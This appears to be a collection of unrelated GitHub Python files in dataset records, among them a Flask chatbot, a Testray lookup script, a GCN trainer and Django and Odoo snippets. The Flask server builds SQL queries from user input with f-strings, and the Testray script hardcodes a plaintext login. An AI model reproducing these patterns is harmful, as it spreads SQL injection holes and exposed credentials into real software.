('{task_id}', '{user['id']}','{user_message}',0,{time.time()})\")\n connection.commit()\n\n\ndef readTodoList():\n connection = sqlite3.connect('botoBrain.db')\n curs = connection.cursor()\n curs.execute(\n f\"SELECT * FROM tasks WHERE user_id = '{user['id']}'\")\n user_tasks = curs.fetchall()\n new_res = ''\n for index, task in enumerate(user_tasks):\n if task[3] == 1:\n task_status = 'COMPLETED'\n else:\n task_status = 'INCOMPLETE'\n date = time.ctime(int(task[4]))\n date = str(date)\n new_res += f\"{index+1}: Created at {date}: {task[2]} status: {task_status} \"\n return new_res\n\n\ndef updateTodoList(user_message):\n taskNum = int(re.search(r'\\d+', user_message).group())\n\n connection = sqlite3.connect('botoBrain.db')\n curs = connection.cursor()\n curs.execute(\n f\"SELECT * FROM tasks WHERE user_id = '{user['id']}' LIMIT 1 OFFSET {taskNum-1}\")\n task = curs.fetchone()\n taskId = task[0]\n\n curs.execute(\n f\"UPDATE tasks SET status = 1 WHERE id = '{taskId}' \")\n connection.commit()\n\n\n@app.route('/todo/')\ndef todoFunc():\n\n user_message = request.args['message']\n\n if not user['name']:\n user['name'] = user_message\n return {\"message\": f\"{checkIfUserIsInDB(user['name'])}, what would you like to do? create a new task or view your to do list?\", \"anim\": \"inlove.gif\"}\n\n if \"create\" in user_message:\n user_message = user_message[7:]\n createNewTask(user_message)\n return {\"message\": \"Created\", \"anim\": \"inlove.gif\"}\n\n if 'read' in user_message:\n return {f\"message\": readTodoList(), \"anim\": \"inlove.gif\"}\n\n if 'update' in user_message:\n updateTodoList(user_message)\n return {\"message\": \"Updated\", \"anim\": \"ok.gif\"}\n\n return {\"message\": \"todooooo\", \"anim\": \"inlove.gif\"}\n\n\n@app.route(\"/message/\", methods=['GET'])\ndef get_message():\n user_message = request.args['message']\n if request.args.get('type'):\n Mtype = request.args['type']\n else:\n Mtype = 'from_external'\n\n if not user['name']:\n user['name'] = user_message\n return {\"message\": f\"Hi, {user['name']}\", \"anim\": \"inlove.gif\"}\n\n if Mtype == 'parrot':\n return {\"message\": user_message, \"anim\": \"dog.gif\"}\n\n if Mtype == 'broken':\n return {\"message\": \"I'm so broken! 
I'm so broken...\", \"anim\": \"heartbroke.gif\"}\n\n if Mtype == 'drunk':\n return {\"message\": drunk(), \"anim\": \"dancing.gif\"}\n\n if Mtype == 'trump':\n return {\"message\": trump(), \"anim\": \"giggling.gif\"}\n\n if Mtype == 'external-bot':\n return {\"message\": external_bot(user_message), \"anim\": \"excited.gif\"}\n\n if Mtype == 'from_external':\n return {\"message\": \"This is the bot police!! You are under arrest\"}\n\n else:\n return {\"message\": \"Hello world\", \"anim\": \"confused.gif\"}\n\n\ndef drunk():\n connection = sqlite3.connect('botoBrain.db')\n curs = connection.cursor()\n curs.execute(\"SELECT * FROM drunk ORDER BY RANDOM() LIMIT 1\")\n res = curs.fetchone()\n return res[1]\n\n\ndef trump():\n trumpQ = requests.get(\n 'https://api.whatdoestrumpthink.com/api/v1/quotes/random').json()\n return trumpQ['message']\n\n\ndef external_bot(user_message):\n req = requests.get(\n f\"https://morning-basin-34003.herokuapp.com/message/?message={user_message}\").json()\n return req['message']\n\n\nif __name__ == \"__main__\":\n app.run(host=\"localhost\", port=7000, debug=True)\n", "repo_name": "ZoZTravolta/BOTO20", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 4609, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 30, "usage_type": "call"}, {"api_name": "uuid.uuid1", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 46, "usage_type": "call"}, {"api_name": "uuid.uuid1", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 50, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 55, "usage_type": "call"}, {"api_name": "time.ctime", "line_number": 66, "usage_type": "call"}, {"api_name": "re.search", "line_number": 73, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 113, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 113, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 114, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 114, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 115, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 115, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 146, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 154, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 160, "usage_type": "call"}]}
+{"seq_id": "18949436590", "text": "#!/usr/bin/python\n\n\n# Script to get from a Github PR to Testray results\n# \n# Requires \"requests\" module (pip install requests)\n#\n# Run with ./testrayPR.py {GITHUB_PR_URL}\n\nimport json\nimport re\nimport requests\nimport sys\n\ndef getTestrayLinks(url):\n login = (\"sir.testalot@liferay.com\", \"TestyourmighT\")\n\n routineIds = [84095177, 84095178, 38582544, 38602290, 439299171, 439299172, 849929038, 849929056]\n\n url_stripped = re.sub(\"<[^<]+?>\", \"\", url)\n\n pull = url_stripped.split(\"#\")[0]\n number = pull.split(\"/\")[-1]\n\n links = {}\n\n for rout in routineIds:\n parameters = {\"testrayRoutineId\": rout, \"delta\": 200}\n\n result = requests.get(\n \"https://testray.liferay.com/home/-/testray/builds.json\",\n auth=login,\n params=parameters)\n\n for r in result.json()[\"data\"]:\n if \"PR#%s \" % (number) in r[\"name\"]:\n links[r[\"name\"]] = r[\"htmlURL\"]\n\n return links\n\ndef displayTestrayLinks(link):\n try:\n tr = getTestrayLinks(link)\n\n if tr:\n tr_message = \"Testray results for this PR:\\n\\n\" \\\n + \"\\n\\n\".join([\"%s\\n%s\" % (k, v)\n for k, v in tr.items()])\n return tr_message\n \n except Exception as e:\n print(e)\n\nif __name__ == \"__main__\":\n try:\n link = sys.argv[1]\n except:\n print(\"Please provide a github pull request URL\")\n exit()\n\n result = displayTestrayLinks(link)\n\n if result:\n print(\"\\n\" + result)\n else:\n print(\"Could not find any testray links for that URL\")\n", "repo_name": "mtambara/devscripts", "sub_path": "testray.py", "file_name": "testray.py", "file_ext": "py", "file_size_in_byte": 1602, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "re.sub", "line_number": 20, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 30, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 56, "usage_type": "attribute"}]}
+{"seq_id": "28758107496", "text": "from __future__ import unicode_literals\nfrom ytmanager import YtManager\nfrom dbmanager import DbManager\nimport time\nimport json\nfrom pathlib import Path\nclass YtPlaylistMan(): \n\n def __init__(self):\n # load config\n path = Path(__file__).parent.absolute()\n configpath = '{}/config.json'.format(path)\n with open(configpath) as file:\n config = json.load(file)\n \n #param\n self.playlist_url = config['playlist-url']\n self.current_download_url_id = \"\"\n self.current_download_url = \"\"\n # self.dbmanager = DbManager()\n\n def run(self):\n # get url\n print('fetching playlist...')\n url_list = YtManager(self).getUrlBasename(self.playlist_url)\n time.sleep(1)\n print('Inserting playlist item to database...')\n DbManager().insertListToDB(url_list)\n\n\n list_for_download = DbManager().getListUndownloadFromDB()\n if list_for_download :\n print('queue for downloading found')\n for item in list_for_download:\n url = 'https://www.youtube.com/watch?v={}'.format(item[\"url_id\"])\n self.current_download_url_id = item[\"url_id\"]\n self.current_download_url = url\n print('Trying to download file...')\n time.sleep(1)\n try:\n YtManager(url).download()\n DbManager().updateDownloadedToDB(item[\"url_id\"])\n except:\n print('failed to download')\n else:\n print('no download queue')\n \n\n\nYtPlaylistMan = YtPlaylistMan()\nYtPlaylistMan.run()", "repo_name": "akzn/youtube-playlist-manager", "sub_path": "index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 1657, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pathlib.Path", "line_number": 11, "usage_type": "call"}, {"api_name": "json.load", "line_number": 14, "usage_type": "call"}, {"api_name": "ytmanager.YtManager", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "dbmanager.DbManager", "line_number": 28, "usage_type": "call"}, {"api_name": "dbmanager.DbManager", "line_number": 31, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "ytmanager.YtManager", "line_number": 41, "usage_type": "call"}, {"api_name": "dbmanager.DbManager", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "24117356991", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\nbeeman_values = [4.484448e-05, 2.880218e-07, 2.750178e-09, 2.737481e-11]\nverlet_values = [5.725727e-04, 4.898959e-06, 4.821672e-08, 4.813985e-10]\ngear_values = [4.048045e-12, 2.999216e-22, 1.436273e-24, 5.572282e-23]\n\nfig = plt.figure()\n#ax = fig.add_subplot(2,1,1)\nprecisions = [\"10^-2\", \"10^-3\", \"10^-4\", \"10^-5\"]\nplt.plot(precisions, beeman_values, label=\"beeman\", linestyle=\"solid\", color=\"k\")\nplt.plot(precisions, verlet_values, label=\"verlet\", linestyle=\"solid\", color=\"r\")\nplt.plot(precisions, gear_values, label=\"gear\", linestyle=\"solid\", color=\"m\")\n#ax.set_yscale('log')\nplt.yscale(\"log\")\nplt.xlabel(\"Paso temporal Δt (s)\")\nplt.legend( loc='upper right')\nplt.ylabel(\"Error Cuadrático Medio\")\nplt.grid(visible=True)\nplt.show()", "repo_name": "ManuelDizen/SimSistemas", "sub_path": "TP4/src/graphs/oscilators2.py", "file_name": "oscilators2.py", "file_ext": "py", "file_size_in_byte": 800, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}]}
+{"seq_id": "28371696898", "text": "from __future__ import print_function\nfrom __future__ import division\nimport numpy as np\nimport torch\nimport math\nfrom torch.nn.parameter import Parameter\nfrom torch.nn.modules.module import Module\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport time\nimport torch.optim as optim\nimport matplotlib.pyplot as plt\nfrom tqdm.notebook import tnrange\nimport pandas as pd\nfrom scipy.sparse import csr_matrix\nfrom scipy.sparse import coo_matrix\nfrom scipy.sparse import diags\nfrom scipy.sparse import eye\nfrom pathlib import Path\nfrom functools import partial\n\nimport sys\nimport json\nimport os\nimport src.models.graph_classification.test_model as test_model\n\ndef main(targets):\n if 'test' in targets:\n with open('config/test_param.json') as fh:\n test_params = json.load(fh)\n\n # run test on cora dataset using GCN\n device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n path = Path(test_params.get('data_path'))\n paper_features_label = np.genfromtxt(path/'cora.content', dtype=np.str)\n\n features = csr_matrix(paper_features_label[:, 1:-1], dtype=np.float32)\n labels = paper_features_label[:, -1]\n lbl2idx = {k:v for v,k in enumerate(sorted(np.unique(labels)))}\n labels = [lbl2idx[e] for e in labels]\n\n papers = paper_features_label[:,0].astype(np.int32)\n\n paper2idx = {k:v for v,k in enumerate(papers)}\n edges = np.genfromtxt(path/'cora.cites', dtype=np.int32)\n edges = np.asarray([paper2idx[e] for e in edges.flatten()], np.int32).reshape(edges.shape)\n\n adj = coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),\n shape=(len(labels), len(labels)), dtype=np.float32)\n\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n adj = test_model.normalize(adj + eye(adj.shape[0]))\n\n adj = torch.FloatTensor(adj.todense())\n features = torch.FloatTensor(features.todense())\n labels = torch.LongTensor(labels)\n\n np.random.seed(42)\n n_train = 200\n n_val = 300\n n_test = len(features) - n_train - n_val\n idxs = np.random.permutation(len(features))\n idx_train = torch.LongTensor(idxs[:n_train])\n idx_val = torch.LongTensor(idxs[n_train:n_train+n_val])\n idx_test = torch.LongTensor(idxs[n_train+n_val:])\n \n adj = adj.to(device)\n features = features.to(device)\n labels = labels.to(device)\n idx_train = idx_train.to(device)\n idx_val = idx_val.to(device)\n idx_test = idx_test.to(device)\n\n n_labels = labels.max().item() + 1\n n_features = features.shape[1]\n\n torch.manual_seed(34)\n\n model = test_model.GCN(nfeat=n_features,\n nhid=20, #hidden = 16\n nclass=n_labels,\n dropout=0.5) #dropout = 0.5\n\n model = model.to(device)\n optimizer = optim.Adam(model.parameters(),\n lr=0.001, weight_decay=5e-4)\n\n\n def accuracy(output, labels):\n preds = output.max(1)[1].type_as(labels)\n correct = preds.eq(labels).double()\n correct = correct.sum()\n return correct / len(labels)\n\n def step():\n t = time.time()\n model.train()\n optimizer.zero_grad()\n output = model(features, adj)\n loss = F.nll_loss(output[idx_train], labels[idx_train])\n acc = accuracy(output[idx_train], labels[idx_train])\n loss.backward()\n optimizer.step()\n \n return loss.item(), acc\n\n def evaluate(idx):\n model.eval()\n output = model(features, adj)\n loss = F.nll_loss(output[idx], labels[idx])\n acc = accuracy(output[idx], labels[idx])\n \n return loss.item(), acc\n\n epochs = 1000\n print_steps = 100\n train_loss, train_acc = [], []\n val_loss, val_acc = [], []\n\n for i in tnrange(epochs):\n tl, ta = 
step()\n train_loss += [tl]\n train_acc += [ta]\n \n if((i+1)%print_steps) == 0 or i == 0:\n tl, ta = evaluate(idx_train)\n vl, va = evaluate(idx_val)\n val_loss += [vl]\n val_acc += [va]\n \n print('Epochs: {}, Train Loss: {:.3f}, Train Acc: {:.3f}, Validation Loss: {:.3f}, Validation Acc: {:.3f}'.format(i, tl, ta, vl, va))\n\n print('Test passed!')\n\nif __name__ == '__main__':\n targets = sys.argv[1:]\n main(targets)", "repo_name": "DylanTao/UCSD_DSC180A_GNN", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 4631, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "json.load", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 33, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.str", "line_number": 35, "usage_type": "attribute"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.genfromtxt", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 46, "usage_type": "attribute"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 49, "usage_type": "attribute"}, {"api_name": "src.models.graph_classification.test_model.normalize", "line_number": 52, "usage_type": "call"}, {"api_name": "src.models.graph_classification.test_model", "line_number": 52, "usage_type": "name"}, {"api_name": "scipy.sparse.eye", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.LongTensor", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 77, "usage_type": "call"}, {"api_name": "src.models.graph_classification.test_model.GCN", "line_number": 79, "usage_type": "call"}, {"api_name": "src.models.graph_classification.test_model", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 85, "usage_type": "name"}, {"api_name": "time.time", "line_number": 96, 
"usage_type": "call"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 100, "usage_type": "name"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 110, "usage_type": "name"}, {"api_name": "tqdm.notebook.tnrange", "line_number": 120, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 136, "usage_type": "attribute"}]}
+{"seq_id": "42022545751", "text": "# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models\nimport logging\nimport ast\n_logger = logging.getLogger('SoL-Qty')\n\n\nclass ResConfigSettings(models.TransientModel):\n \n _inherit = 'res.config.settings'\n \n #sol_qty_other_company_ids = fields.One2many('sale.qty.other.company',related=\"company_id.sol_qty_other_company_ids\")\n sol_qty_other_company_ids = fields.Many2many(\"sale.qty.other.company\",string='Company SoL Qty. Settings')\n sol_qty = fields.Selection([('qty_on_hand', 'Quantity on Hand'),\n ('qty_forecasted', 'Forecasted Quantity'), ('qty_available', 'Available Quantity')], default='qty_on_hand', \n string=\"SOL Available Qty\", related=\"company_id.sol_qty\",\n help=\"\"\"Quantity on Hand: Is the quantity of the selected product currently in the warehouse.\\n\n Forecasted Quantity: Is the forecasted quantity or \"quantity to be\" of the selected product.\\n\n Available Quantity: Is the quantity on hand minus the reserved quantity of the selected product.\"\"\")\n \n @api.model\n def get_values(self):\n res = super(ResConfigSettings, self).get_values()\n# rec_ids = self.env['ir.config_parameter'].sudo().get_param('sol_qty_available.sol_qty_other_company_ids')\n rec_ids = self.env['sale.qty.other.company'].sudo().search([]).ids\n _logger.info(rec_ids)\n# if not rec_ids:\n res.update(sol_qty_other_company_ids=[(6, 0, rec_ids)])\n# else:\n# res.update(sol_qty_other_company_ids=[(6, 0, ast.literal_eval(rec_ids))])\n return res\n \n# @api.multi\n# def set_values(self):\n# super(ResConfigSettings, self).set_values()\n# set_param = self.env['ir.config_parameter'].sudo().set_param\n# set_param('sol_qty_available.sol_qty_other_company_ids', self.sol_qty_other_company_ids.ids)", "repo_name": "szenma/odoo12module", "sub_path": "sol_qty_available/model/res_config_settings.py", "file_name": "res_config_settings.py", "file_ext": "py", "file_size_in_byte": 1981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 6, "usage_type": "call"}, {"api_name": "odoo.models.TransientModel", "line_number": 9, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 9, "usage_type": "name"}, {"api_name": "odoo.fields.Many2many", "line_number": 14, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 14, "usage_type": "name"}, {"api_name": "odoo.fields.Selection", "line_number": 15, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 15, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 22, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 22, "usage_type": "name"}]}
+{"seq_id": "41975769506", "text": "import esper\nfrom component import *\nimport pygame\nfrom pygame.locals import *\n\nclass ProcessorAttack(esper.Processor):\n \"\"\" ProcessorAttack main class \"\"\"\n\n def __init__(self):\n super().__init__()\n\n def process(self):\n for oEntity, (oComponentAttack, oComponentPosition, oComponentRenderable) in self.world.get_components(ComponentAttack, ComponentPosition, ComponentRenderable):\n if oComponentAttack.bAttack == True:\n oComponentAttack.bAttack = False\n\n iAttackerDirectionX = self.world.component_for_entity(oEntity, ComponentDirection).iDirectionX\n iAttackerDirectionY = self.world.component_for_entity(oEntity, ComponentDirection).iDirectionY\n\n fAttackPositionX = oComponentPosition.fPositionX + oComponentRenderable.fWidth / 2\n fAttackPositionY = oComponentPosition.fPositionY + oComponentRenderable.fHeight / 2\n\n\n if iAttackerDirectionX == -1:\n fAttackPositionX -= oComponentRenderable.fWidth / 2 + oComponentAttack.fWidth\n fWidth = oComponentAttack.fWidth\n fHeight = oComponentAttack.fHeight\n elif iAttackerDirectionX == 1:\n fAttackPositionX += oComponentRenderable.fWidth / 2\n fWidth = oComponentAttack.fWidth\n fHeight = oComponentAttack.fHeight\n else:\n pass\n\n if iAttackerDirectionY == -1:\n fAttackPositionY -= oComponentRenderable.fHeight / 2 + oComponentAttack.fWidth\n fWidth = oComponentAttack.fHeight\n fHeight = oComponentAttack.fWidth\n elif iAttackerDirectionY == 1:\n fAttackPositionY += oComponentRenderable.fHeight / 2\n fWidth = oComponentAttack.fHeight\n fHeight = oComponentAttack.fWidth\n else:\n pass\n\n iEntityAttack = self.world.create_entity()\n self.world.add_component(\n iEntityAttack,\n ComponentRenderable(\n oImage=pygame.image.load('greysquare.png')\n )\n )\n self.world.add_component(\n iEntityAttack,\n ComponentCollision(\n oRectange = Rect(\n fAttackPositionX,\n fAttackPositionY,\n fWidth,\n fHeight\n ),\n bWall = False,\n iEntity = iEntityAttack\n )\n )\n self.world.add_component(\n iEntityAttack,\n ComponentPosition(\n fPositionX = fAttackPositionX,\n fPositionY = fAttackPositionY\n )\n )\n self.world.add_component(\n iEntityAttack,\n ComponentFrameLife(\n iFrame = oComponentAttack.iFrame\n )\n )\n self.world.add_component(\n iEntityAttack,\n ComponentDamage(\n iDamage = oComponentAttack.iDamage,\n iEntityProtect = oEntity\n )\n )\n\n if oComponentAttack.fVelocity != 0:\n fDirectionX = oComponentAttack.fVelocity * self.world.component_for_entity(oEntity, ComponentDirection).iDirectionX\n fDirectionY = oComponentAttack.fVelocity * self.world.component_for_entity(oEntity, ComponentDirection).iDirectionY\n\n self.world.add_component(\n iEntityAttack,\n ComponentVelocity(\n fDirectionX = fDirectionX,\n fDirectionY = fDirectionY\n )\n )\n", "repo_name": "agivern/pythonTraining", "sub_path": "processor/processorAttack.py", "file_name": "processorAttack.py", "file_ext": "py", "file_size_in_byte": 4097, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "esper.Processor", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 50, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 50, "usage_type": "attribute"}]}
+{"seq_id": "24841860069", "text": "from django.urls import path\nfrom .views import views\n\nurlpatterns = [\n path(\"use_case\", views.add_use_case),\n path(\"list_simulators\", views.list_simulators),\n path(\"restart_simulator\", views.restart_simulator),\n path(\"stop_simulator\", views.stop_simulator),\n path(\"check_status\", views.check_status),\n]\n", "repo_name": "MMostafa-Hub/GS-Headway-Docker-Django-API", "sub_path": "timeseries_project/api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 319, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "views.views.add_use_case", "line_number": 5, "usage_type": "attribute"}, {"api_name": "views.views", "line_number": 5, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "views.views.list_simulators", "line_number": 6, "usage_type": "attribute"}, {"api_name": "views.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.views.restart_simulator", "line_number": 7, "usage_type": "attribute"}, {"api_name": "views.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "views.views.stop_simulator", "line_number": 8, "usage_type": "attribute"}, {"api_name": "views.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.views.check_status", "line_number": 9, "usage_type": "attribute"}, {"api_name": "views.views", "line_number": 9, "usage_type": "name"}]}
+{"seq_id": "5809009941", "text": "from collections import deque\ndef solution(maps):\n dx = [1, -1, 0, 0]\n dy = [0, 0, 1, -1]\n result = []\n\n for row in range(len(maps)):\n for col in range(len(maps[0])):\n if maps[row][col] == 'S':\n start = (row, col, 0)\n if maps[row][col] == 'L':\n lever = (row, col, 0)\n if maps[row][col] == 'E':\n end = (row, col, 0)\n order = [[start, lever], [lever, end]]\n \n for s, e in order:\n visited = set(s)\n queue = deque([s])\n answer = -1\n while queue:\n x, y, t = queue.popleft()\n if (x, y) == (e[0], e[1]):\n answer = t\n break\n for i in range(4):\n mx, my = x + dx[i], y + dy[i]\n if mx < 0 or mx >= len(maps) or my < 0 or my >= len(maps[0]) or (mx, my) in visited or maps[mx][my] == 'X':\n continue\n queue.append((mx, my, t+1))\n visited.add((mx, my))\n if answer == -1:\n return -1\n result.append(answer)\n return sum(result)", "repo_name": "Liebestraum1/Algorithm_Python", "sub_path": "Programmers/Level_2/미로 탈출.py", "file_name": "미로 탈출.py", "file_ext": "py", "file_size_in_byte": 1113, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.deque", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "70019411607", "text": "# views.py\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom .forms import AssignmentCreationForm\nfrom googleapiclient.discovery import build\nfrom google.oauth2 import service_account\nfrom accounts.views import fetch_students\n\n\ndef create_assignment(request):\n if request.method == \"POST\":\n form = AssignmentCreationForm(request.POST)\n if form.is_valid():\n assignment = form.save(commit=False)\n assignment.lecturer = (\n request.user.lecturer\n ) # Associate assignment with the logged-in lecturer\n assignment.save()\n return redirect(\n \"assignment_list\"\n ) # Redirect to a list of assignments or a success page\n else:\n form = AssignmentCreationForm()\n\n return render(request, \"accounts/lecturers/create_assignment.html\", {\"form\": form})\n\n\ndef allStudents(request):\n students = fetch_students()\n context = {\"students\": students}\n return render(request, \"lecturers/allStudents.html\", context)\n\n\ndef success(request):\n return render(request, \"success.html\")\n\n\ndef lecturers(request):\n return render(request, \"lecturers.html\")\n", "repo_name": "HeartfeltDevelopers/heartfeltInstitute", "sub_path": "lecturers/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1184, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "forms.AssignmentCreationForm", "line_number": 11, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 18, "usage_type": "call"}, {"api_name": "forms.AssignmentCreationForm", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}, {"api_name": "accounts.views.fetch_students", "line_number": 28, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}]}
